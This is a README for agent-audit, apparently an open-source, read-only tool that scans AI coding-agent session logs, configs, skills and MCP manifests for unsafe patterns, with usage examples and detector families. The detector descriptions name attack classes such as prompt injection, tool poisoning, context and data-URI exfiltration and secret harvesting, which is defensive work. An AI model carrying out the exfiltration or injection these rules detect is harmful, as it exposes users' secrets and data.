Forensic auditor for local AI coding agents (Claude Code, Codex CLI, OpenClaw)
and project-surface scanner for repos containing skills, plugins, and MCP
manifests. Reads session logs, configs, and instruction files, detects
known-bad patterns using 296 bundled rules in total, including 167
static-file-applicable rules for scan-project, plus native ASAMM detectors,
produces a report, and optionally cross-verifies findings using any combination
of installed CLIs, direct API keys, or local LLMs.
agent-audit is one of the implementation projects in the broader
ASAMM effort. In ASAMM terms,
this repo is the practical measurement and auditing layer: it turns
agent-safety patterns into something you can run against real repos, local
agent homes, session traces, skill collections, plugin registries, and MCP
manifests.
Sergey Gordeychik
[email protected]
The immediate problem is practical, not purely academic: coding-agent usage
is spreading quickly, and incident reports, prompt-injection cases,
credential leaks, tool-poisoning patterns, and unsafe autonomy examples are
spreading with it. Maintainers need a way to review their own repositories.
Users need a way to triage third-party agent repos before installing skills,
trusting MCP servers, or reusing workflow instructions. agent-audit exists
to make that review automatable and repeatable.
The project is deliberately not "just another signature pack". It is a runner, normalizer, and post-analysis layer around multiple detector families, with extra native logic for agent-specific control gaps that generic scanners usually miss.
| Mode | Input | Output | Best for |
|---|---|---|---|
scan |
Local agent home, configs, hooks, session logs | Verified-first forensic report bundle | Incident review, local environment audit, suspicious agent runs |
scan-project |
One repo or a corpus of repos with instruction surfaces | Project findings, clustered findings, security profile, collection-scale patterns | Pre-release repo audit, third-party repo triage, corpus research |
In both modes, the pipeline is short and predictable:
- Discover inputs: find agent homes, session traces, or instruction surfaces such as skills, manifests, and config files.
- Apply detectors: run native ASAMM logic plus imported rule packs only where they fit the detected surface.
- Normalize and group: deduplicate overlapping rule hits into artifact-backed issue instances and optionally collapse repeated patterns into collection-scale aggregates.
- Write review artifacts: emit reports, sidecars, security profiles, and optional verifier-backed follow-up outputs.
flowchart LR
A["Inputs<br/>agent homes / logs / repos / skills / manifests"] --> B["Surface discovery<br/>& parsing"]
B --> C["Native + imported detectors"]
C --> D["Normalization<br/>clustering / aggregation / severity mapping"]
D --> E["Outputs<br/>reports / sidecars / security profile / verification"]
git clone [email protected]:scadastrangelove/agent-audit.git
cd agent-audit
python3 -m venv .venv
source .venv/bin/activate
pip install -e .Sanity check:
agent-audit --help
agent-audit packsagent-audit has two main operating modes.
Use this when you want to inspect a local agent home, session logs, config, hooks, and traces for known-bad behavior.
Typical cases:
- review a Claude Code or Codex environment after a suspicious run
- inspect whether an agent wrote dangerous config, touched secrets, or drifted into unsafe autonomy
- generate a verified incident-style report bundle
Examples:
# Auto-discover local agent homes and prompt for consent before reading
agent-audit scan
# Write a full report bundle
agent-audit scan --output ./reports/forensic-run -y
# Ask for verifier review as part of the scan
agent-audit scan --output ./reports/forensic-run --verify -y
# Show available detector packs / bundled rules
agent-audit packs
agent-audit packs --allWhat you get:
- raw findings from logs, configs, and instruction files
- verified-first report bundles for review and sharing
- optional config patch suggestions
- optional verifier re-checks using configured LLM backends
Use this when you want to audit repos containing SKILL.md, AGENTS.md,
CLAUDE.md, plugin manifests, MCP manifests, tool descriptions, or similar
instruction surfaces.
Typical cases:
- audit your own skill repo before release
- triage third-party agent repos before reuse
- scan a large corpus of repos for research, benchmarking, or regression tracking
Examples:
# Scan one repo
agent-audit scan-project ~/code/my-agent-repo
# Scan a directory of repos and write output artifacts
agent-audit scan-project ~/code/corpus --output ./reports/project-scan -y
# Focus on one imported pack
agent-audit scan-project ~/code/corpus --tool atr
agent-audit scan-project ~/code/corpus --tool cisco-promptguard
# Reduce noise and keep only stronger findings
agent-audit scan-project ~/code/corpus --min-severity high
# See every repeated finding individually instead of collection-scale rollup
agent-audit scan-project ~/code/corpus --no-aggregateWhat you get:
project-findings.jsonandproject-findings.mdclustered-findings.jsonsecurity-profile.jsonfiles-of-concern.jsonreport-profiles.json- collection-scale aggregation for repeated skill/template patterns
Example output directory from scan-project --output ./reports/project-scan:
reports/project-scan/
project-findings.json
project-findings.md
clustered-findings.json
security-profile.json
files-of-concern.json
report-profiles.json
For maintainers:
- Run
scan-projecton your repository before publishing. - Review
project-findings.mdandsecurity-profile.json. - Fix or narrow the broadest instruction surfaces first.
- Re-run with
--min-severity highfor a tighter release gate.
For users evaluating third-party repos:
- Run
scan-projecton the repo or corpus you plan to reuse. - Look first at clustered findings and collection-scale patterns.
- Treat broad external action, autonomy loops, and trust-boundary expansion findings as review priorities.
- If the repo looks suspicious, follow with
scanon the actual local agent environment after installation/use.
For research / corpora:
- Scan a directory of repos with
scan-project. - Keep raw, clustered, and aggregate outputs separate.
- Use
corpus-labfor regression snapshots and stability checks.
agent-audit currently combines:
- Native ASAMM detectors for agent-specific structural gaps such as broad external action without approval, autonomous loops with writes, and persistent identity rewrite.
- ATR (Agent Threat Rules) for prompt injection, agent manipulation, excessive autonomy, skill compromise, tool poisoning, context exfiltration, and related agent-centric attack patterns.
- Aguara-derived rules for external download/install trust-boundary expansion, third-party content ingestion, SSRF-cloud, and related remote input / remote execution surfaces.
- Cisco PromptGuard-style rules for PII harvesting, secret patterns, markdown/data-URI exfiltration, and related prompt/output abuse patterns.
The bundled counts are currently:
233ATR rules37Aguara-derived rules26Cisco PromptGuard-derived rules- native ASAMM detectors and project-specific post-processing on top
See THIRD_PARTY_LICENSES.md for provenance and license details.
Using multiple sources matters, but the bigger value is what agent-audit
does around them:
- Surface-aware application.
scan-projectdoes not blindly regex every file. It classifies instruction surfaces such asSKILL.md,AGENTS.md, plugin manifests, MCP manifests, tool descriptions, and task YAMLs, then applies only the relevant rules. - Field-aware filtering. Rules meant for live session events are not blindly reused on flat repo text. This removes a large false-positive class that appears when session-oriented packs are applied out of context.
- Native agent-specific logic. Some important problems are absence-based or structural, not just lexical. "Broad action without approval" and "persistent identity rewrite" are examples where native detectors add signal that raw imported signatures do not provide well.
- Canonical clustering and deduplication. Different packs often describe
different facets of the same dangerous surface.
agent-auditclusters raw rule hits into artifact-backed issue instances instead of treating every firing as a separate security fact. - Collection-scale aggregation. When one replicated skill template fires hundreds of times, the tool can collapse that into a collection-scale pattern instead of flooding the operator with near-identical findings.
- Severity normalization and reporting. Imported severities and native detector outputs are normalized into one reporting layer, then exposed in raw, clustered, and aggregate views.
- Optional verification. Findings can be re-checked with external or local LLM backends, which is useful when raw pattern matches are noisy or context-sensitive.
In short: upstream signatures provide ingredients; agent-audit provides
the agent-repo-specific execution model, filtering, clustering, and review
workflow needed to make those ingredients operational.
No active defense — read-only analysis with consent prompts at every step. Generates ready-to-review config patches, but never applies them.
See ROADMAP.md for what's coming. See docs/architecture.md for the technical architecture — pipeline stages, module layout, how to add detectors/ surfaces/rules. Start here if you're picking up the project. See docs/ast-precision-plan.md for the staged AST / tree-sitter / Rego adoption plan (v0.12 → v1.0).
See CHANGELOG.md for current release notes and docs/HISTORICAL_CHANGELOG.md for detailed research-phase iteration history.